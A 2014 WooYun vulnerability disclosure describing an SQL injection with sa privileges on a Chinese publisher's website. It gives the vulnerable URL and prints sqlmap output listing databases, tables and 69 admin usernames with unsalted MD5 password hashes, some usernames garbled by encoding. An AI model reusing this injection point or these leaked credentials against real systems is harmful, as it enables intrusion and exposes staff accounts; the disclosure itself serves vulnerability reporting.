当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-076084

漏洞标题:社会科学文献出版社某处存在Sql注入,sa权限

相关厂商:ssap.com.cn

漏洞作者: Martial

提交时间:2014-09-15 14:13

修复时间:2014-10-30 14:14

公开时间:2014-10-30 14:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-15: 细节已通知厂商并且等待厂商处理中
2014-09-15: 厂商已经确认,细节仅向厂商公开
2014-09-25: 细节向核心白帽子及相关领域专家公开
2014-10-05: 细节向普通白帽子公开
2014-10-15: 细节向实习白帽子公开
2014-10-30: 细节向公众公开

简要描述:

sa权限

详细说明:

注入点
http://www.ssap.com.cn/SKWX/Job_list.aspx?type=1
先用WebCruiser大致的检测了下

1.jpg


可跨库~~
然后就用sqlmap跑下具体的表和数据

2.jpg


available databases [24]:
[*] BH_CMS_v4.1
[*] BH_SSAP_EN
[*] fll
[*] fll_new
[*] master
[*] model
[*] msdb
[*] new524
[*] pishu
[*] pishuDB
[*] ReportServer
[*] ReportServerTempDB
[*] ssap_20131021
[*] ssap_new
[*] ssap_new_DB
[*] ssap_new_DB(0427)
[*] ssap_new_test1
[*] ssap_temp
[*] ssdph_new
[*] tempdb
[*] test
[*] test_6-21
[*] ttttt
[*] vote
我就只跑了第一个数据库的一个admin的表 其他表 还有大量信息

3.jpg


Database: BH_CMS_v4.1
[107 tables]
+------------------------------+
| anonymous.D99_CMD |
| anonymous.D99_REG |
| anonymous.D99_Tmp |
| anonymous.bin_cmd |
| anonymous.kill_kk |
| anonymous.sqlmapoutput |
| anonymous.sysfile1 |
| anonymous.systree |
| CartNoteTable |
| OrderNoteTable |
| T_BHC_Ad |
| T_BHC_Admin |
| T_BHC_AuthorizationKeys |
| T_BHC_AuthorizationUsers |
| T_BHC_CommentsManagement |
| T_BHC_ContentLabel |
| T_BHC_ContentManager |
| T_BHC_Email |
| T_BHC_EmailConfig |
| T_BHC_Form |
| T_BHC_HotWord |
| T_BHC_Hr |
| T_BHC_Hr_Job |
| T_BHC_IPBlackList |
| T_BHC_IPWhiteList |
| T_BHC_Infomation |
| T_BHC_KeyWordsFiltration |
| T_BHC_KindManager |
| T_BHC_Label |
| T_BHC_Link |
| T_BHC_Logs |
| T_BHC_MatchTemplate |
| T_BHC_Menu |
| T_BHC_Pic |
| T_BHC_Relation |
| T_BHC_Role |
| T_BHC_SCSYIMG |
| T_BHC_Template |
| T_BHC_UploadConfig |
| T_BHC_Vote |
| T_BHC_VoteDetailInfo |
| T_BHC_VoteOptionInfo |
| T_BHC_WarterConfig |
| T_BHS_AddValue |
| T_BHS_Alipay |
| T_BHS_Announcement |
| T_BHS_Area |
| T_BHS_AuthorManager |
| T_BHS_Bank |
| T_BHS_BookShelf |
| T_BHS_Carriage |
| T_BHS_CarriageDetail |
| T_BHS_CarriageNew |
| T_BHS_Cart |
| T_BHS_Center |
| T_BHS_City |
| T_BHS_Ebook |
| T_BHS_EbookList |
| T_BHS_EbookSetting |
| T_BHS_EngOrder |
| T_BHS_ExchangeDetails |
| T_BHS_Help |
| T_BHS_KeyCode |
| T_BHS_Logistics |
| T_BHS_Message |
| T_BHS_MessageReplay |
| T_BHS_Order |
| T_BHS_OrderList |
| T_BHS_OrderLog |
| T_BHS_Payment |
| T_BHS_PressManager |
| T_BHS_ProductCommentsManager |
| T_BHS_ProductManager |
| T_BHS_ProductManager_Publish |
| T_BHS_ProductMomentManager |
| T_BHS_ProductProperties |
| T_BHS_ProductTypeManeger |
| T_BHS_ProductUnitManager |
| T_BHS_Province |
| T_BHS_SalesPromotion |
| T_BHS_Task |
| T_BHS_Tips |
| T_BHS_TipsDetail |
| T_BHS_TotalPromotion |
| T_BHS_User |
| T_BHS_VoteLog |
| T_BHS_Voucher |
| T_BHS_WebMessage |
| T_BHV_KindAndContent |
| T_HBC_EmphasesCommend |
| T_LogTemp |
| V_BHS_BookTips |
| V_BHS_Product_Detail_Info |
| V_Content_Kind |
| View_CommentsManager |
| View_dao |
| aaa |
| au_Content |
| comd_list |
| dtest |
| jiaozhu |
| syscommand |
| sysdiagrams |
| tb_Vote |
| tree_tmp1 |
| vote_book |
| vote_catory |
+------------------------------+
跑了下T_BHC_Admin 的信息
Table: T_BHC_Admin
[13 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| Admin_AddTime | datetime |
| Admin_Answer | varchar |
| Admin_DisName | varchar |
| Admin_Email | varchar |
| Admin_Id | int |
| Admin_KindStr | varchar |
| Admin_LastLogTime | varchar |
| Admin_LogName | varchar |
| Admin_LogTimeNum | int |
| Admin_Pwd | varchar |
| Admin_Question | varchar |
| Admin_RoleId | varchar |
| Admin_State | varchar |
+-------------------+----------+
然后跑了下
Admin_LogName和Admin_Pwd
Table: T_BHC_Admin

4.jpg


[69 entries]
+----------------------------------+---------------+
| Admin_Pwd | Admin_LogName |
+----------------------------------+---------------+
| 5C2A1408402C4AE0D181E70E2BE314CB | 00021 |
| 146F7B060850F7D1B2402E518BFFF8ED | 00031 |
| 55587A910882016321201E6EBBC9F595 | 00033 |
| D94BCCA44C6F80EAD0D54C2BAAF5F9B4 | 00034 |
| 716E5BC387719C96A9B75BCF78D0C1CB | admin |
| 792B77B2FA6738E17435B6CAB107ABD4 | admin02 |
| 05A671C66AEFEA124CC08B76EA6D30BB | contest |
| 96E79218965EB72C92A549DD5A330112 | Gison |
| E10ADC3949BA59ABBE56E057F20F883E | guoyong |
| BA30903BC4A3E9D65F9F09A59B2BCF9C | hyh |
| 98D73B056368C44B4609376760C738C0 | jiangmin |
| A95FEECE5F6109A4B1668FEB3CE6AEE9 | lixu2012 |
| CE799224C384AAF05DBA5711846607B5 | qiuqiu |
| 95C168F1F128177545F3C2C700189AEC | scsxs |
| D6E0D63E3EE76856A3CB0E9B1D6164A3 | shixisheng01 |
| E10ADC3949BA59ABBE56E057F20F883E | vote |
| 7C95056948B24EA6FEE3C5EAA4379B2C | wanglinhua |
| 8EF7BFBB7F65E02C775E8F3D26325843 | wangting |
| E10ADC3949BA59ABBE56E057F20F883E | xiaosong |
| 88BDBC044D908B65CDADB3DE02C095C5 | yishuangjian |
| A327590741B453AE63755014CA86B195 | zhongdianyun |
| 9303EF52E4B232086D16A1888CE75D70 | zhouhu |
| E10ADC3949BA59ABBE56E057F20F883E | zly |
| E10ADC3949BA59ABBE56E057F20F883E | 缂栬瘧涓績 |
| E10ADC3949BA59ABBE56E057F20F883E | 璐㈢粡閮� |
| E10ADC3949BA59ABBE56E057F20F883E | 钄$户杈� |
| D783D003A8E5AB0CA6FE840575454C7D | 鏇圭户鐜� |
| E10ADC3949BA59ABBE56E057F20F883E | 闄堝鑾� |
| F5D33835BEAF7B2D5121D2938095A7F2 | 鎴寸惇 |
| E10ADC3949BA59ABBE56E057F20F883E | 鐢靛瓙闊冲儚 |
| E10ADC3949BA59ABBE56E057F20F883E | 娈典含姊� |
| E10ADC3949BA59ABBE56E057F20F883E | 楂樿澊铦� |
| E10ADC3949BA59ABBE56E057F20F883E | 鍏虫櫠鐒� |
| D783D003A8E5AB0CA6FE840575454C7D | 閮媷 |
| E10ADC3949BA59ABBE56E057F20F883E | 鍥介檯涓績 |
| E10ADC3949BA59ABBE56E057F20F883E | 榛勫厓娲� |
| E10ADC3949BA59ABBE56E057F20F883E | 缁忛攢鍟� |
| E10ADC3949BA59ABBE56E057F20F883E | 鏁戞姢閮� |
| E10ADC3949BA59ABBE56E057F20F883E | 鏉庢晱 |
| 4CAA4E23BF71142A84DE833C62F1AD56 | 鏉庨洩鑾� |
| E10ADC3949BA59ABBE56E057F20F883E | 鍒樺痉椤� |
| AFEB42D9F9F45FF335A6CAB8CA8743BC | 鏌虫潹 |
| B4A47B31FA036F3CCAA53E6979D18FBF | 椴佽摀 |
| 72AFF010F7A5064683829056740C540B | 鐗涢粠铏� |
| E10ADC3949BA59ABBE56E057F20F883E | 娼樿緣 |
| 93E953A4C4892E6E18DB4BFCB89E8C1F | 褰悜闃� |
| E10ADC3949BA59ABBE56E057F20F883E | 鐨功涓績 |
| E10ADC3949BA59ABBE56E057F20F883E | 鐨爺涓績 |
| E10ADC3949BA59ABBE56E057F20F883E | 浜哄姏璧勬簮 |
| E10ADC3949BA59ABBE56E057F20F883E | 浜哄姏璧勬簮閮� |
| E10ADC3949BA59ABBE56E057F20F883E | 浜烘枃閮� |
| E10ADC3949BA59ABBE56E057F20F883E | 浠荤孩瀹� |
| E10ADC3949BA59ABBE56E057F20F883E | 浠荤澘鏄� |
| E10ADC3949BA59ABBE56E057F20F883E | 绀剧閮� |
| E10ADC3949BA59ABBE56E057F20F883E | 鏁板瓧鍐呭 |
| EEEF2AA8B6D34E40D8DAB1A6905F7238 | 瀹嬫窇娲� |
| 79C850BF82F8FBCC0344569F63961A28 | 鐜嬫枃闈� |
| 94937509BD53D2B7A64BA5F157E5FF17 | 鐜嬬拠 |
| 96E79218965EB72C92A549DD5A330112 | 鏄熺惔 |
| E10ADC3949BA59ABBE56E057F20F883E | 寰愮劚绾� |
| E10ADC3949BA59ABBE56E057F20F883E | 瀛︽湳涓績 |
| E10ADC3949BA59ABBE56E057F20F883E | 鏄撳缓楣� |
| F5D33835BEAF7B2D5121D2938095A7F2 | 灏归湶闇� |
| E10ADC3949BA59ABBE56E057F20F883E | 鎭借枃 |
| E10ADC3949BA59ABBE56E057F20F883E | 寮犳緞 |
| E10ADC3949BA59ABBE56E057F20F883E | 寮犻潤楦� |
| E10ADC3949BA59ABBE56E057F20F883E | 鍛ㄥ噷娉� |
| F16AC835DBE9306AEF289706A4204702 | 鎬荤紪瀹� |
| E10ADC3949BA59ABBE56E057F20F883E | 閭规瞾鑺� |
+----------------------------------+---------------+
由于我虚拟机测试的 编码传到这里就出了点问题 看下面的图
img src="/upload/201409/142312330d699953ec3237b52a8f67a8dbb58136.jpg" alt="5.jpg" />

漏洞证明:

5.jpg

修复方案:

过滤危险字符

版权声明:转载请注明来源 Martial@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-09-15 14:30

厂商回复:

非常感谢,我们出版有许多人文社科类图书。只要您感兴趣,我们都提供。再次感谢。

最新状态:

暂无